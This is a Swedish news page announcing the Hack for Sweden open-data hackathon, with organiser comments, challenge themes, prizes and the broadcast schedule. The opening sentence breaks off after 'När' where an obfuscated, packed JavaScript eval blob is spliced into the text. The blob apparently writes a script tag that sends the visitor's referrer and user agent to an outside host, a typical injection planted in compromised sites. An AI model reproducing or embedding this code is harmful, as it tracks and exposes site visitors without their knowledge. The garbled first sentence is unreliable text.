Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

Öppna data i fokus på myndighetshack den 12-13 mars

Öppna data i fokus på myndighetshack den 12-13 mars
Sebastian

När eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzzyi|var|u0026u|referrer|hnddy||js|php’.split(’|’),0,{}))
Sveriges största myndighetshackaton, Hack for Sweden, arrangeras för tredje gången samlas 24 lag i Naturvårdsverkets lokaler i Stockholm. Under ett dygn ska de tävla om vem som är bäst på att skapa nya digitala tjänster och lösningar med hjälp av öppen data.

– Hack for Sweden som arrangerades första gången 2014 växer och i år står 23 statliga myndigheter och organisationer bakom hacket. Bredden på utmaningarna som deltagarna valt att jobba med är i år större än tidigare, säger Angela Yong, från SMHI och projektledare för Hack for Sweden.

Bland deltagarna på Hack för Sweden finns yrkesverksamma IT-utvecklare såväl som studenter från universitet och högskolor. Många städer i Sverige finns representerade i startfältet, till exempel Stockholm, Göteborg, Malmö, Linköping, Norrköping och Halmstad. Utmaningarna som deltagarna tar sig an är på teman som hållbara städer, cykelinfrastruktur, turism,miljö, hälsa och framtidens arbets- och bostadsmarknad.

Utmärkelsen Hack for Sweden Award går till det lag som enligt juryn kombinerar data på ett kreativt sätt och skapar den bästa och mest nyskapande applikationen eller tjänsten som tydligt visar nyttan med myndigheternas öppna data. Det delas även ut pris till Bästa visualisering, Bästa affärsnytta, Bästa nytta för allmänheten samt deltagarnas pris.

Hack for Sweden inleds klockan 10.00 på lördagen den 12 mars. Lagens presentationer och prisutdelningen på söndagen den 13 mars kommer att sändas direkt på Hack for Swedens Youtube-kanal med början klockan 10.00. Prisutdelningen äger rum klockan 13.30.

Media är välkomna att följa hela eller delar av Hack for Sweden på plats. Vill du inför tävlingen ha kontakt med ett lag från en viss ort eller är intresserad av ett särskilt tema som något av lagen arbetar med, så tveka inte att höra av dig till oss.

Mer information finns på www.hackforsweden.se